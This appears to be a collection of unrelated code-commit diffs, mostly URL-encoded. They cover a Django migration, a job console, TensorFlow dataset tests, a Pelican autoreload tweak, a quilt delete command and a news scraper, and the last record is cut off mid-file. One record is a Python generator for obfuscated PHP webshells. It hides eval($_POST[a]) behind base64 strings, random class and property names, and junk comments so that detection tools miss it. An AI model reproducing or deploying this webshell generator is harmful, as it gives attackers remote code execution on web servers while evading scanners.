@@ -0,0 +1,2082 @@ +# -*- coding: utf-8 -*-%0A# Generated by Django 1.11 on 2017-10-05 22:09%0Afrom __future__ import unicode_literals%0A%0Aimport django.core.validators%0Afrom django.db import migrations, models%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('timetables', '0001_initial'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='course',%0A name='name',%0A field=models.CharField(help_text='Example: appetizer, main course, dessert', max_length=150),%0A ),%0A migrations.AlterField(%0A model_name='course',%0A name='sequence_order',%0A field=models.PositiveSmallIntegerField(help_text='The numerical order of the dishes for a meal option. E.g, 1 for appetizer, 2 for main course', unique=True),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='cycle_length',%0A field=models.PositiveSmallIntegerField(help_text='Number of days in which the menu timetable is repeated after a period of time. E.g, A cycle length of 14 days (2 weeks) including the inactive weekdays like weekends after which the food schedule is repeated.', validators=%5Bdjango.core.validators.MinValueValidator(1)%5D),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='ref_cycle_date',%0A field=models.DateField(help_text='The reference date in time with which cycle day for any other following date can be computed. E.g, 1 if today is Sunday as first day of the cycle length. No need to always update this except the cycle changes.'),%0A ),%0A migrations.AlterField(%0A model_name='timetable',%0A name='ref_cycle_day',%0A field=models.PositiveSmallIntegerField(help_text='The reference day (numerical value) in time with which cycle day for any other following date can be computed. E.g, 1 if today is Sunday as first day of the cycle length. No need to always update this except the cycle changes.', validators=%5Bdjango.core.validators.MinValueValidator(1)%5D),%0A ),%0A %5D%0A
7f2f0dca532ce3cbcf33720e56a639f78b82e771
add console utility
multivac/console.py
multivac/console.py
Python
0.000001
@@ -0,0 +1,2341 @@ +import sys%0Afrom termcolor import colored%0A%0Afrom multivac.version import version%0Afrom multivac.models import JobsDB%0Afrom multivac.util import format_time%0A%0Aclass Console(object):%0A def __init__(self):%0A self.prompt = colored('multivac%3E ','cyan',attrs=%5B'bold'%5D) %0A self.db = JobsDB('localhost', 6379)%0A%0A self.commands = %7B 'jobs' : self.jobs, %0A 'logs' : self.logs, %0A 'actions' : self.actions,%0A 'exit' : self.exit %7D%0A %0A self.run()%0A%0A def run(self):%0A print('Multivac version %25s' %25 (version)) %0A while True:%0A cmdline = input(self.prompt).split(' ')%0A cmd = cmdline.pop(0)%0A args = ' '.join(cmdline)%0A%0A if cmd not in self.commands:%0A print('invalid command: %25s' %25 (cmd))%0A else:%0A if args:%0A self.commands%5Bcmd%5D(args)%0A else:%0A self.commands%5Bcmd%5D()%0A%0A def jobs(self):%0A jobs = self.db.get_jobs()%0A for j in jobs:%0A created = format_time(j%5B'created'%5D)%0A%0A if j%5B'status'%5D == 'completed':%0A status = colored(j%5B'status'%5D, 'green')%0A elif j%5B'status'%5D == 'pending':%0A status = colored(j%5B'status'%5D, 'yellow')%0A else:%0A status = j%5B'status'%5D%0A%0A print('%25s %25s(%25s) %25s' %25 (created, j%5B'id'%5D, j%5B'name'%5D, status))%0A%0A def logs(self, job_id):%0A jobs = self.db.get_jobs()%0A if job_id not in %5B j%5B'id'%5D for j in jobs %5D:%0A print(colored('no such job: %25s' %25 job_id, 'red'))%0A return%0A%0A print('%5Cn'.join(self.db._get_stored_log(job_id)))%0A%0A%0A def actions(self):%0A actions = self.db.get_actions()%0A%0A output = %5B %5B'Name','Command','Confirm Required'%5D %5D%0A%0A for a in actions:%0A name = colored(a%5B'name'%5D, 'white', attrs=%5B'bold'%5D)%0A output.append(%5Ba%5B'name'%5D, a%5B'cmd'%5D, a%5B'confirm_required'%5D%5D)%0A%0A self._print_column(output)%0A%0A def exit(self):%0A sys.exit(0)%0A%0A def _print_column(self, data, has_header=True):%0A col_width = max(len(word) for row in data for word in row) + 2%0A for row in data:%0A print(''.join(word.ljust(col_width) for word in row))%0A%0Aif __name__ == '__main__':%0A c = Console()%0A
f4202292570eb51e52629ad09280175b42598d52
Add Divider class
murasame/divider.py
murasame/divider.py
Python
0.000001
@@ -0,0 +1,1127 @@ +import os%0A%0Aimport pandas as pd%0A%0Afrom . import CONFIG%0A%0Aconf = CONFIG%5B%22divider%22%5D%0A%0A%0Aclass Divider(object):%0A def __init__(self, df, files, base):%0A self.data = df%0A self.files = files%0A self.base = base%0A self.writers = %7B%7D%0A%0A def _setup_writer(self, outdir):%0A assert self.files%0A os.makedirs(outdir, exist_ok=True)%0A%0A for name in self.files.keys():%0A path = os.path.join(outdir, name)%0A self.writers%5Bname%5D = pd.ExcelWriter(path)%0A%0A def save(self, outdir):%0A self._setup_writer(outdir)%0A%0A for classname, member in self.data.groupby(self.base):%0A member = member.drop(self.base, axis=1)%0A for filename, classnames in self.files.items():%0A if classname in classnames:%0A target = self.writers%5Bfilename%5D%0A break%0A else:%0A raise RuntimeError%0A%0A member.to_excel(target, classname, index=False)%0A%0A for w in self.writers.values():%0A w.save()%0A%0A%0Adef divider(df):%0A div = Divider(df, conf%5B%22files%22%5D, conf%5B%22base%22%5D)%0A div.save(conf%5B%22out%22%5D)%0A
d03a412e5be455a85ad0a4b624c71bbc30fb1ffb
add a sleep to the autoreload loop since we dont need too high cpu load
pelican/__init__.py
pelican/__init__.py
import argparse import os from pelican.generators import (ArticlesGenerator, PagesGenerator, StaticGenerator, PdfGenerator) from pelican.settings import read_settings from pelican.utils import clean_output_dir, files_changed from pelican.writers import Writer from pelican import log VERSION = "2.6.0" class Pelican(object): def __init__(self, settings=None, path=None, theme=None, output_path=None, markup=None, keep=False): """Read the settings, and performs some checks on the environment before doing anything else. """ self.path = path or settings['PATH'] if not self.path: raise Exception('you need to specify a path containing the content' ' (see pelican --help for more information)') if self.path.endswith('/'): self.path = path[:-1] # define the default settings self.settings = settings self.theme = theme or settings['THEME'] output_path = output_path or settings['OUTPUT_PATH'] self.output_path = os.path.realpath(output_path) self.markup = markup or settings['MARKUP'] self.keep = keep or settings['KEEP_OUTPUT_DIRECTORY'] # find the theme in pelican.theme if the given one does not exists if not os.path.exists(self.theme): theme_path = os.sep.join([os.path.dirname( os.path.abspath(__file__)), "themes/%s" % self.theme]) if os.path.exists(theme_path): self.theme = theme_path else: raise Exception("Impossible to find the theme %s" % theme) def run(self): """Run the generators and return""" context = self.settings.copy() generators = [ cls( context, self.settings, self.path, self.theme, self.output_path, self.markup, self.keep ) for cls in self.get_generator_classes() ] for p in generators: if hasattr(p, 'generate_context'): p.generate_context() # erase the directory if it is not the source if os.path.realpath(self.path).startswith(self.output_path) and not self.keep: clean_output_dir(self.output_path) writer = self.get_writer() for p in generators: if hasattr(p, 'generate_output'): p.generate_output(writer) def get_generator_classes(self): generators = [ArticlesGenerator, PagesGenerator, StaticGenerator] if self.settings['PDF_GENERATOR']: generators.append(PdfGenerator) return generators def get_writer(self): return Writer(self.output_path, settings=self.settings) def main(): parser = argparse.ArgumentParser(description="""A tool to generate a static blog, with restructured text input files.""") parser.add_argument(dest='path', nargs='?', help='Path where to find the content files') parser.add_argument('-t', '--theme-path', dest='theme', help='Path where to find the theme templates. If not specified, it' 'will use the default one included with pelican.') parser.add_argument('-o', '--output', dest='output', help='Where to output the generated files. If not specified, a directory' ' will be created, named "output" in the current path.') parser.add_argument('-m', '--markup', default=None, dest='markup', help='the list of markup language to use (rst or md). Please indicate ' 'them separated by commas') parser.add_argument('-s', '--settings', dest='settings', help='the settings of the application. Default to None.') parser.add_argument('-k', '--keep-output-directory', dest='keep', action='store_true', help='Keep the output directory and just update all the generated files.' 
'Default is to delete the output directory.') parser.add_argument('-v', '--verbose', action='store_const', const=log.INFO, dest='verbosity', help='Show all messages') parser.add_argument('-q', '--quiet', action='store_const', const=log.CRITICAL, dest='verbosity', help='Show only critical errors') parser.add_argument('-D', '--debug', action='store_const', const=log.DEBUG, dest='verbosity', help='Show all message, including debug messages') parser.add_argument('--version', action='version', version=VERSION, help='Print the pelican version and exit') parser.add_argument('-r', '--autoreload', dest='autoreload', action='store_true', help="Relaunch pelican each time a modification occurs on the content" "files") args = parser.parse_args() log.init(args.verbosity) # Split the markup languages only if some have been given. Otherwise, populate # the variable with None. markup = [a.strip().lower() for a in args.markup.split(',')] if args.markup else None if args.settings is None: settings = {} settings = read_settings(args.settings) cls = settings.get('PELICAN_CLASS') if isinstance(cls, basestring): module, cls_name = cls.rsplit('.', 1) module = __import__(module) cls = getattr(module, cls_name) try: pelican = cls(settings, args.path, args.theme, args.output, markup, args.keep) if args.autoreload: while True: try: if files_changed(pelican.path, pelican.markup): pelican.run() except KeyboardInterrupt: break else: pelican.run() except Exception, e: log.critical(str(e)) if __name__ == '__main__': main()
Python
0
@@ -18,16 +18,28 @@ mport os +%0Aimport time %0A%0Afrom p @@ -5713,16 +5713,74 @@ break%0A + time.sleep(.5) # sleep to avoid cpu load%0A
7d987220474d76286c49b5378861854a09798a16
create project folder
PowerOutagePredictor/Tree/_init_.py
PowerOutagePredictor/Tree/_init_.py
Python
0.000001
@@ -0,0 +1 @@ +%0A
43d9582172cb268f9c2f38f3cd211bbca06b0741
Create php_webshell.py
php/php_webshell.py
php/php_webshell.py
Python
0
@@ -0,0 +1,1082 @@ +import random%0A%0A#author: pureqh%0A#github: https://github.com/pureqh/webshell%0A%0A%0Ashell = '''%3C?php %0Aclass %7B0%7D%7B3%7D%0A public $%7B1%7D = null;%0A public $%7B2%7D = null;%0A public $%7B6%7D = null;%0A function __construct()%7B3%7D%0A $this-%3E%7B1%7D = 'ZXZhbCgkX1BPU';%0A $this-%3E%7B6%7D = '1RbYV0pOw==';%0A $this-%3E%7B2%7D = @base64_decode($this-%3E%7B1%7D.$this-%3E%7B6%7D);%0A @eval(%7B5%7D.$this-%3E%7B2%7D.%7B5%7D);%0A %7B4%7D%7B4%7D%0Anew %7B0%7D();%0A?%3E'''%0A%0A%0Adef random_keys(len):%0A str = '%60~-=!@#$%25%5E&_+?%3C%3E%7C:%5B%5DabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'%0A return ''.join(random.sample(str,len))%0A%0Adef random_name(len):%0A str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'%0A return ''.join(random.sample(str,len)) %0A %0Adef build_webshell():%0A className = random_name(4)%0A parameter1 = random_name(5)%0A parameter2 = random_name(6)%0A lef = '''%7B'''%0A rig = '''%7D'''%0A disrupt = %22%5C%22/*%22+random_keys(7)+%22*/%5C%22%22%0A parameter3 = random_name(6)%0A shellc = shell.format(className,parameter1,parameter2,lef,rig,disrupt,parameter3)%0A return shellc%0A%0A%0Aif __name__ == '__main__':%0A print (build_webshell())%0A
87b597fd5363ca14a8e491ba84bedb4486c6676b
Test __bytes__ special method
python3/jute/test/test_jute_bytes.py
python3/jute/test/test_jute_bytes.py
Python
0.000469
@@ -0,0 +1,2307 @@ +import unittest%0A%0Afrom jute import Interface, Dynamic%0A%0A%0Aclass BytesLike(Interface):%0A%0A def __iter__(self):%0A %22%22%22bytes-like object must be iterable.%22%22%22%0A%0A def __bytes__(self):%0A %22%22%22Return bytes representation.%22%22%22%0A%0A%0Aclass BytesTestMixin:%0A%0A def get_test_object(self):%0A return object()%0A%0A def test_bytes(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(bytes(bytes_like), b'foo')%0A%0A def test_getattr(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(getattr(bytes_like, '__bytes__')(), b'foo')%0A%0A def test_attribute(self):%0A bytes_like = self.get_test_object()%0A self.assertEqual(bytes_like.__bytes__(), b'foo')%0A%0A%0Aclass FooBytes(BytesLike.Provider):%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __bytes__(self):%0A return b'foo'%0A%0A%0Aclass BytesInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return FooBytes()%0A%0A%0Aclass BytesInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(FooBytes())%0A%0A%0Aclass FooBytesProxy(Dynamic.Provider):%0A%0A def provides_interface(self, interface):%0A return interface.implemented_by(BytesLike)%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __bytes__(self):%0A return b'foo'%0A%0A%0Aclass BytesDynamicInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return FooBytesProxy()%0A%0A%0Aclass BytesDynamicInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(FooBytesProxy())%0A%0A%0A# __bytes__ is never optimised away, so generated version works as is%0A%0Aclass GeneratedBytes(BytesLike.Provider):%0A%0A %22%22%22A class that generates the __bytes__ method dynamically.%22%22%22%0A%0A def __iter__(self):%0A return iter(b'foo')%0A%0A def __getattr__(self, name):%0A if name == '__bytes__':%0A def f():%0A return b'foo'%0A return f%0A raise AttributeError(name)%0A%0A%0Aclass GeneratedBytesInstanceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return GeneratedBytes()%0A%0A%0Aclass GeneratedBytesInterfaceTests(BytesTestMixin, unittest.TestCase):%0A%0A def get_test_object(self):%0A return BytesLike(GeneratedBytes())%0A
0b20df518e66e3763a05ca796880c96d8e1d291d
compute covariance of multiple objects
cov_obs.py
cov_obs.py
Python
0.99999
@@ -0,0 +1,2103 @@ +import numpy as np%0Aimport matplotlib.pyplot as plt%0A%0Afrom astropy import constants as c, units as u, table as t%0Afrom astropy.io import fits%0Afrom astropy import coordinates as coords%0A%0Aimport os%0A%0Aimport spec_tools%0Aimport ssp_lib%0Aimport manga_tools as m%0A%0Afrom itertools import izip, product%0Afrom glob import glob%0A%0Adef extract_duplicate_spectra(lllim, lulim):%0A '''%0A for a single object, extract duplicate spectra in the correct%0A wavelength range, and output into two stacked arrays (flux and ivar)%0A '''%0A%0Adef compute_cov(objs_fs, objs_ivars, dest='cov_obs.fits'):%0A '''%0A given a list of spectra, grouped by object, find the spectral covariance%0A '''%0A%0A # for each object (group of spectra), subtract the mean spectrum%0A # (mean is weighted by ivar + eps)%0A%0A objs_normed = %5Bf - np.average(f, weights=i, axis=0) for f in obj_fs%5D%0A objs_normed = np.row_stack(objs_normed)%0A%0A objs_ivars = np.row_stack(objs_ivars)%0A # and take the (weighted) covariance of the residual%0A%0A # this loop is bad and I should feel bad%0A covar = np.empty((objs_fs%5B0%5D.shape%5B1%5D, ) * 2)%0A for j, k in product(range(covar.shape%5B0%5D), range(covar.shape%5B1%5D)):%0A covar%5Bj, k%5D = np.average(%0A (objs_normed%5B:, j%5D * objs_normed%5B:, k%5D),%0A weights=(objs_ivars%5B:, j%5D*objs_ivars%5B:, k%5D))%0A%0A hdulist = %5Bfits.PrimaryHDU(covar)%5D%0A hdulist = fits.HDUList(hdulist)%0A hdulist.writeto(dest)%0A%0A return covar%0A%0Adef find_BOSS_duplicates():%0A '''%0A using spAll file, find objIDs that have multiple observations, and%0A the associated %5Bplate/mjd/fiberid%5D combinations%0A '''%0A # read in file that contains all BOSS observation coordinates%0A obs_t = t.Table.read()%0A%0A # objectIDs for all %22primary objects%22%0A prim = obs_t%5Bobs_t%5B'specprimary'%5D%5D%5B'objid'%5D%0A%0A collated = %7B%7D%0A for p in prim:%0A obj = obs_t%5Bobs_t%5B'objid'%5D == p%5D%0A # when there's only one observation, we don't care!%0A if len(obj) %3C= 1:%0A continue%0A%0A # when there's more than one, output %5Bplate, mjd, fiber%5D to dict%0A collated%5Bp%5D = %5Br%5B'plate', 'mjd', 'fiberid'%5D r in obj%5D%0A
5e398ae0d8074a3caf11997884d9f719ef047b15
Define exception for incorrect arguments
soccer/exceptions.py
soccer/exceptions.py
Python
0.005016
@@ -0,0 +1,52 @@ +class IncorrectParametersException(Exception):%0A%09pass
d7020ccb328747922942c56872bcfbec47d451ae
Add cli command class for delete
quilt/cli/delete.py
quilt/cli/delete.py
Python
0
@@ -0,0 +1,2828 @@ +# vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:%0A%0A# python-quilt - A Python implementation of the quilt patch system%0A#%0A# Copyright (C) 2012 Bj%C3%B6rn Ricks %3Cbjoern.ricks@googlemail.com%3E%0A#%0A# This library is free software; you can redistribute it and/or%0A# modify it under the terms of the GNU Lesser General Public%0A# License as published by the Free Software Foundation; either%0A# version 2.1 of the License, or (at your option) any later version.%0A%0A# This library is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU%0A# Lesser General Public License for more details.%0A%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this library; if not, write to the Free Software%0A# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA%0A# 02110-1301 USA%0A%0Afrom quilt.cli.meta import Command%0Afrom quilt.delete import Delete%0A%0Aclass DeleteCommand(Command):%0A%0A usage = %22%25prog delete %5B-r%5D %5B--backup%5D %5Bpatch%7C-n%5D%22%0A name = %22delete%22%0A%0A def add_args(self, parser):%0A parser.add_option(%22-r%22, help=%22Remove the deleted patch file from the %22 %5C%0A %22patches directory as well.%22,%0A action=%22store_true%22, dest=%22remove%22, default=False)%0A parser.add_option(%22-n%22, help=%22Delete the next patch after topmost, %22 %5C%0A %22rather than the specified or topmost %22 %5C%0A %22patch.%22,%0A action=%22store_true%22, dest=%22next%22)%0A parser.add_option(%22--backup%22, help=%22Rename the patch file to patch~ %22 %5C%0A %22rather than deleting it. Ignored if %22 %5C%0A %22not used with %60-r'.%22,%0A action=%22store_true%22, default=False, dest=%22backup%22)%0A%0A def run(self, options, args):%0A delete = Delete(self.get_cwd(), self.get_pc_dir(),%0A self.get_patches_dir())%0A delete.deleted_patch.connect(self.deleted_patch)%0A delete.deleting_patch.connect(self.deleting_patch)%0A%0A if options.next and len(args) %3E 0:%0A parser.print_usage()%0A sys.exit(1)%0A%0A if options.next:%0A delete.delete_next(options.remove, options.remove)%0A else:%0A patch = None%0A if len(args) %3E 0:%0A patch = args%5B0%5D%0A%0A delete.delete_patch(patch, options.remove, options.remove)%0A%0A def deleted_patch(self, patch):%0A print %22Removed patch %25s%22 %25 patch.get_name()%0A%0A def deleting_patch(self, patch, applied):%0A if applied:%0A print %22Removing currently applied patch %25s%22 %25 patch.get_name()%0A else:%0A print %22Removing patch %25s%22 %25 patch.get_name()%0A
8dfd59a639bcf540ea4c5a52e91c5f8a7a198554
Initialize affineKeyTest
books/CrackingCodesWithPython/Chapter14/affineKeyTest.py
books/CrackingCodesWithPython/Chapter14/affineKeyTest.py
Python
0.000001
@@ -0,0 +1,400 @@ +# This program proves that the keyspace of the affine cipher is limited%0A# to less than len(SYMBOLS) %5E 2.%0A%0Aimport affineCipher, cryptomath%0A%0Amessage = 'Make things as simple as possible, but not simpler.'%0Afor keyA in range(2, 80):%0A key = keyA * len(affineCipher.SYMBOLS) + 1%0A%0A if cryptomath.gcd(keyA, len(affineCipher.SYMBOLS)) == 1:%0A print(keyA, affineCipher.encryptMessage(key, message))
b8e36b1a6f8563645413595f8f51aae8c0a91a69
Switch PrefetchWithSlackTest to use TF combinations
tensorflow/python/data/experimental/kernel_tests/prefetch_with_slack_test.py
tensorflow/python/data/experimental/kernel_tests/prefetch_with_slack_test.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for `experimental_slack` option.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import parameterized from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.kernel_tests import test_base from tensorflow.python.data.ops import dataset_ops from tensorflow.python.data.ops import multi_device_iterator_ops from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.framework import test_util from tensorflow.python.platform import test @test_util.run_all_in_graph_and_eager_modes class PrefetchWithSlackTest(test_base.DatasetTestBase, parameterized.TestCase): @test_util.run_v1_only("b/121264236") def testPrefetchWithSlackOption(self): """Determines slack_period based on num devices attached to iterator.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) multi_device_iterator = multi_device_iterator_ops.MultiDeviceIterator( dataset, ["/cpu:1", "/cpu:2"]) dataset = multi_device_iterator._dataset # pylint: disable=protected-access self.assertIn("slack", dataset.options()._static_optimizations()) self.assertIn("slack:slack_period:2", dataset.options()._static_optimization_configs()) config = config_pb2.ConfigProto(device_count={"CPU": 3}) with self.test_session(config=config): self.evaluate(multi_device_iterator.initializer) for i in range(0, 10, 2): elem_on_1, elem_on_2 = multi_device_iterator.get_next() self.assertEqual(i, self.evaluate(elem_on_1)) self.assertEqual(i + 1, self.evaluate(elem_on_2)) with self.assertRaises(errors.OutOfRangeError): elem_on_1, elem_on_2 = multi_device_iterator.get_next() self.evaluate(elem_on_1) self.evaluate(elem_on_2) def testPrefetchWithSlackOptionWithoutIterator(self): """Defaults to slack period of 1 without iterator.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) self.assertIn("slack", dataset.options()._static_optimizations()) self.assertIn("slack:slack_period:1", dataset.options()._static_optimization_configs()) self.assertDatasetProduces(dataset, range(10)) def testWithPassthroughDataset(self): """Should still work with a passthrough dataset after prefetch().""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) dataset = dataset.map(lambda x: x + 1) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) self.assertDatasetProduces(dataset, range(1, 11)) def testErrorWithoutPrefetch(self): """The rewrite fails if there is no prefetch() in the pipeline.""" dataset = dataset_ops.Dataset.range(10) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) with self.assertRaises(errors.InvalidArgumentError): get_next = self.getNext(dataset) self.evaluate(get_next()) def testErrorWithInvalidDataset(self): """With a nested dataset op after prefetch, the rewrite should fail.""" dataset = dataset_ops.Dataset.range(10) dataset = dataset.prefetch(1) dataset = dataset.flat_map(dataset_ops.Dataset.from_tensors) options = dataset_ops.Options() options.experimental_slack = True dataset = dataset.with_options(options) with self.assertRaises(errors.InvalidArgumentError): get_next = self.getNext(dataset) self.evaluate(get_next()) if __name__ == "__main__": ops.enable_eager_execution( config=config_pb2.ConfigProto(device_count={"CPU": 3})) test.main()
Python
0
@@ -1140,16 +1140,69 @@ import +combinations%0Afrom tensorflow.python.framework import errors%0Af @@ -1247,58 +1247,8 @@ ops -%0Afrom tensorflow.python.framework import test_util %0Afro @@ -1294,52 +1294,8 @@ t%0A%0A%0A -@test_util.run_all_in_graph_and_eager_modes%0A clas @@ -1377,44 +1377,125 @@ %0A%0A -@test_util.run_v1_only(%22b/121264236%22 +# TODO(b/121264236)%0A @combinations.generate(%0A combinations.combine(tf_api_version=%5B1%5D, mode=%5B%22graph%22, %22eager%22%5D) )%0A @@ -2734,16 +2734,80 @@ _on_2)%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def te @@ -3336,24 +3336,88 @@ range(10))%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def testWi @@ -3807,24 +3807,88 @@ ge(1, 11))%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def testEr @@ -4275,16 +4275,80 @@ ext())%0A%0A + @combinations.generate(test_base.default_test_combinations())%0A def te
77094bb723d35fd23d909e0c59b712eeb7612495
Add fibonacci HW
training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py
training/level-1-the-zen-of-python/dragon-warrior/Fibonacci/stapp_Fibtest.py
Python
0.999987
@@ -0,0 +1,466 @@ +%22%22%22%0ACompute Fibonacci sequence and learn python.%0ASteve Tapp%0A%22%22%22%0Aimport sys%0Aimport timeit%0A%0Afib_seq = %5B0, 1%5D%0Afib_even_sum = 0%0A%0Afor fibnum in range (2, 50):%0A fib_seq.append(fib_seq%5B-2%5D + fib_seq%5B-1%5D)%0A print (fibnum, fib_seq%5Bfibnum%5D)%0A if fib_seq%5B-1%5D %3E= 4000000:%0A break%0A if not fib_seq%5Bfibnum%5D %25 2:%0A print ('even', fib_seq%5Bfibnum%5D)%0A fib_even_sum += fib_seq%5Bfibnum%5D%0A%0Aprint ('Sum of even fibonacci terms under 4 million is ', fib_even_sum)%0A
b1a851d6f5dd47790459564a55405627d9b7a9e4
Add news date and title scrapper from ist's news page.
scripts/webscraping/ist_news_titles.py
scripts/webscraping/ist_news_titles.py
Python
0
@@ -0,0 +1,517 @@ +from urllib.request import urlopen%0Afrom bs4 import BeautifulSoup%0Aimport sys, io%0A%0Asys.stdout = io.TextIOWrapper(sys.stdout.buffer,'cp437','backslashreplace')%0A%0Ahtml = urlopen(%22http://tecnico.ulisboa.pt/pt/noticias/%22)%0AbsObj = BeautifulSoup(html, %22html.parser%22)%0A%0A%0Afor news_wrapper in bsObj.find(%22div%22, %7B%22id%22:%22content_wrapper%22%7D).findAll(%22div%22, %7B%22class%22:%22news_wrapper%22%7D):%0A%09news_grid = news_wrapper.find(%22div%22, %7B%22class%22:%22grid_9 omega%22%7D)%0A%09print(%22Date: %22 + news_grid.p.get_text())%0A%09print(%22Title: %22 + news_grid.h3.a.get_text())
bd9496bf726aff0472a52d6c5e2a0db96f2af8e2
Add allow_skipped_files option to DJANGO_DEFAULTS
djangae/core/management/__init__.py
djangae/core/management/__init__.py
import os import sys import argparse import djangae.sandbox as sandbox from djangae.utils import find_project_root # Set some Django-y defaults DJANGO_DEFAULTS = { "storage_path": os.path.join(find_project_root(), ".storage"), "port": 8000, "admin_port": 8001, "api_port": 8002, "automatic_restart": "False" } def _execute_from_command_line(sandbox_name, argv, **sandbox_overrides): with sandbox.activate(sandbox_name, add_sdk_to_path=True, **sandbox_overrides): import django.core.management as django_management # Now on the path return django_management.execute_from_command_line(argv) def execute_from_command_line(argv=None, **sandbox_overrides): """Wraps Django's `execute_from_command_line` to initialize a djangae sandbox before running a management command. Note: The '--sandbox' arg must come first. All other args are forwarded to Django as normal. """ argv = argv or sys.argv parser = argparse.ArgumentParser(prog='manage.py') parser.add_argument( '--sandbox', default=sandbox.LOCAL, choices=sandbox.SANDBOXES.keys()) parser.add_argument('args', nargs=argparse.REMAINDER) namespace = parser.parse_args(argv[1:]) overrides = DJANGO_DEFAULTS overrides.update(sandbox_overrides) return _execute_from_command_line(namespace.sandbox, ['manage.py'] + namespace.args, **overrides) def remote_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the remote sandbox""" return _execute_from_command_line(sandbox.REMOTE, argv or sys.argv, **sandbox_overrides) def local_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the local sandbox""" return _execute_from_command_line(sandbox.LOCAL, argv or sys.argv, **sandbox_overrides) def test_execute_from_command_line(argv=None, **sandbox_overrides): """Execute commands in the test sandbox""" return _execute_from_command_line(sandbox.TEST, argv or sys.argv, **sandbox_overrides)
Python
0.000003
@@ -322,16 +322,52 @@ %22False%22 +,%0A %22allow_skipped_files%22: %22True%22, %0A%7D%0A%0A%0Adef
6317a43baed719bddd84863b750018a6ef1287b0
add new test
test/test_canvas.py
test/test_canvas.py
Python
0.000001
@@ -0,0 +1,226 @@ +import sequana.resources.canvas.bar as bar%0A%0A%0A%0Adef test_bar():%0A%0A data = %5B%0A %7B%22name%22:%22A%22, %22data%22:%7B%22R1%22:10, %22R2%22:90%7D%7D,%0A %7B%22name%22:%22B%22, %22data%22:%7B%22R1%22:90, %22R2%22:10%7D%7D%5D%0A bar.stacked_bar(%22title%22, %22ACGT%22, datalist=data)%0A
2d9712f5b1fecb8a1f6c989ed835a9476b5cdab5
Create MeshTextureCoordinates.py
MeshTextureCoordinates.py
MeshTextureCoordinates.py
Python
0.000001
@@ -0,0 +1,1091 @@ +#***********************************************************************************************************#%0A#********* Get normalized 2-D texture coordinates of a mesh object *****************************************#%0A#********* by Djordje Spasic *******************************************************************************#%0A#********* issworld2000@yahoo.com 17-Feb-2015 **************************************************************#%0A%22%22%22%0ARhino 5 SR11 (and all older releases) still does not have RhinoScript MeshTextureCoordinates function implemented for PythonScript.%0AMeshTextureCoordinates returns normalized (between 0 and 1) 2-D texture coordinates of a mesh object. %0ASmall function bellow replicates this functionality.%0A%22%22%22%0A%0Aimport rhinoscriptsyntax as rs%0A%0Adef MeshTextureCoordinates(object_id):%0A meshObj = rs.coercemesh(object_id)%0A mCoordL = %5B%5D%0A for i in range(meshObj.TextureCoordinates.Count):%0A mCoordL.append(meshObj.TextureCoordinates%5Bi%5D)%0A return mCoordL%0A%0AmeshId = rs.GetObject(%22pick up your mesh%22, 32)%0Acoord = MeshTextureCoordinates(meshId)%0Aprint coord%0A
09fb916697f28c423c85dad5f77eebaac3c93199
Correct _get_origin_method
smile_action_rule/models/action_rule_decorator.py
smile_action_rule/models/action_rule_decorator.py
# -*- encoding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2010 Smile (<http://www.smile.fr>). All Rights Reserved # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import inspect from openerp import _ from openerp.sql_db import Cursor from openerp.exceptions import Warning def _get_args(self, method, args, kwargs): # 